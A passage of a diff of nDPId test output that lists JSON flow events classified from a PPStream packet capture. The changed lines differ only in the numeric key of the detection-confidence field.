00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.47.91.129","src_port":22793,"dst_port":22576,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353138757,"flow_last_seen":1467353138794,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353140755,"flow_last_seen":1467353140794,"flow_idle_time":7580000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":4283,"flow_avg_l4_payload_len":856,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165456,"flow_last_seen":1467353165492,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353160157,"flow_last_seen":1467353163154,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353138757,"flow_last_seen":1467353138794,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353140755,"flow_last_seen":1467353140794,"flow_idle_time":7580000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":4283,"flow_avg_l4_payload_len":856,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165456,"flow_last_seen":1467353165492,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353160157,"flow_last_seen":1467353163154,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":200000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00597{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136439,"flow_last_seen":1467353136440,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.249.53.196","src_port":22793,"dst_port":32443,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136439,"flow_last_seen":1467353136440,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.249.53.196","src_port":22793,"dst_port":32443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191500,"flow_last_seen":1467353191505,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":439,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1467353191521,"flow_last_seen":1467353191606,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":476,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191604,"flow_last_seen":1467353191608,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":529,"flow_first_seen":1467353196856,"flow_last_seen":1467353197680,"flow_idle_time":7580000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":664395,"flow_avg_l4_payload_len":1255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":542,"flow_first_seen":1467353198532,"flow_last_seen":1467353199507,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":681117,"flow_avg_l4_payload_len":1256,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191500,"flow_last_seen":1467353191505,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":439,"flow_tot_l4_payload_len":583,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1467353191521,"flow_last_seen":1467353191606,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":476,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":310,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191604,"flow_last_seen":1467353191608,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":472,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":529,"flow_first_seen":1467353196856,"flow_last_seen":1467353197680,"flow_idle_time":7580000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":664395,"flow_avg_l4_payload_len":1255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":542,"flow_first_seen":1467353198532,"flow_last_seen":1467353199507,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":681117,"flow_avg_l4_payload_len":1256,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 
00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353190168,"flow_last_seen":1467353190235,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":338,"flow_first_seen":1467353136439,"flow_last_seen":1467353136982,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":124558,"flow_avg_l4_payload_len":368,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.42.0.158","src_port":22793,"dst_port":7716,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353187172,"flow_last_seen":1467353202194,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":798,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353187172,"flow_last_seen":1467353202194,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":798,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.28","dst_ip":"239.255.255.250","src_port":60023,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.171.1","src_port":22793,"dst_port":29702,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.171.1","src_port":22793,"dst_port":29702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353156959,"flow_last_seen":1467353156998,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":376,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157063,"flow_last_seen":1467353157103,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":425,"flow_tot_l4_payload_len":728,"flow_avg_l4_payload_len":364,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191688,"flow_last_seen":1467353191722,"flow_idle_time":7580000,"flow_min_l4_payload_len":237,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":787,"flow_avg_l4_payload_len":393,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353156959,"flow_last_seen":1467353156998,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":376,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157063,"flow_last_seen":1467353157103,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":425,"flow_tot_l4_payload_len":728,"flow_avg_l4_payload_len":364,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191688,"flow_last_seen":1467353191722,"flow_idle_time":7580000,"flow_min_l4_payload_len":237,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":787,"flow_avg_l4_payload_len":393,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1467353136439,"flow_last_seen":1467353136982,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1083,"flow_tot_l4_payload_len":10732,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.197.138.12","src_port":22793,"dst_port":6956,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":101,"flow_first_seen":1467353136433,"flow_last_seen":1467353136982,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":34577,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"118.171.15.56","dst_ip":"192.168.115.8","src_port":5544,"dst_port":22793,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136616,"flow_last_seen":1467353136617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136616,"flow_last_seen":1467353136617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139505,"flow_last_seen":1467353139595,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":720,"flow_avg_l4_payload_len":360,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139627,"flow_last_seen":1467353139779,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":332,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 